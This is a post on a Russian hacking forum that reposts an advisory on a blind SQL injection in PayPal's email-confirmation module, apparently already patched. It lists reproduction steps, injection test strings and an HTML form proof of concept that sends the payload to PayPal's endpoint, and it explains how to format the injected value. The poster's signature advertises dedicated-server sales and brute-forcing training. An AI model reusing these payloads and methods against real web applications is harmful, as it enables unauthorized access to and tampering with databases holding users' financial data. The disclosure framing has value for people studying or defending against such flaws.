Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Безопасность / English Forum
   
  Страница 1
  , 17:56   #1
Banned
 
Локация: DE
Регистрация: 18.12.2010
Сообщений: 1,538

Репутация: 51 / 0
По умолчанию Paypal.com Blind SQL Injection

Paypal.com Blind SQL Injection


The blind sql injection vulnerability can be exploited by remote attackers with low privileged application user account and
without required user interaction. For demonstration or reproduce ...

URL1: Request a Session with 2 different mails (Step1)
https://www.paypal.com/de/ece/cn=060...iliuty-lab.com
https://www.paypal.com/de/ece/cn=060...x445@gmail.com

URL2: Injection into ID Confirm Field (Step2)
https://www.paypal.com/de/cgi-bin/we...ssword-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846

1. Open the website of paypal and login as standard user with a restricted account
2. Switch to the webscr > Confirm Email module of the application
3. Request a login confirm id when processing to load a reset
4. Take the valid confirm number of the mail and insert it into the email confirm number verification module input fields
5. Switch to the last char of the valid confirm number in the input field and inject own sql commands as check to proof the validation

Test Strings:
-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'
-1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1'
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1'

6. Normally the website with the generated ID confirm button is bound to the standard template.
7. Inject substrings with the id -1+sql-query to proof for blind injections in the input field
8. The bottom bar gets loaded as result for the successful executed sql query
8. Now, the remote attacker can manipulate the paypal core database with a valid confirm number + his own sql commands

Bug Type: Blind SQL INJECTION
SESSION: DE - 22:50 -23:15 (paypal.com)
Browser: Mozilla Firefox 18.01

PoC:
<form method="post" action="https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846" class="">
<p class="group"><label for="login_confirm_number_id"><span class="labelText"><span class="error">
Please enter it here</span></span></label><span class="field"><input id="login_confirm_number_id" class="xlarge"
name="login_confirm_number" value="06021484023174514599-1+[BLIND SQL-INJECTION!]--" type="text"></span></p><p class="buttons">
<input name="confirm.x" value="Confirm" class="button primary" type="submit"></p><input name="form_charset"
value="UTF-8" type="hidden"></form>

Note: Do all requests ever with id to reproduce the issue. (-) is not possible as first char of the input request.

Example(Wrong): -1+[SQL-Injection]&06021484023183514599
Example(Right): 06021484023183514599-1+[SQL-Injection]--
Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'--

Note:
After inject was successful 2 times because of my check, the paypal website opened a security issue report message box as exception-handling.
I included the details and information of my test and explained the issue and short time later it has been patched.
__________________
Продажа Выделенных Серверов ( Дедиков )
Работаю под заказы ( Страна,Штат,Округ,Город )
Обучение brutu: Dedicated Server аnd Icq
Пользователь вне форума    
Наши Спонсоры
 

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection tickhack English Forum 1 11.12.2014 11:35
BLIND SQL - INJECTION t0xA Сайты, Форумы, CMS 7 04.12.2013 13:07
SQL injection полный FAQ deihack Сайты, Форумы, CMS 0 21.01.2012 12:16
SQL Injection для чайников, взлом ASP+MSSQL tickhack Сайты, Форумы, CMS 2 21.01.2012 12:08
SQL Injection в Oracle Ram0nlord Сайты, Форумы, CMS 10 10.10.2009 18:44



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.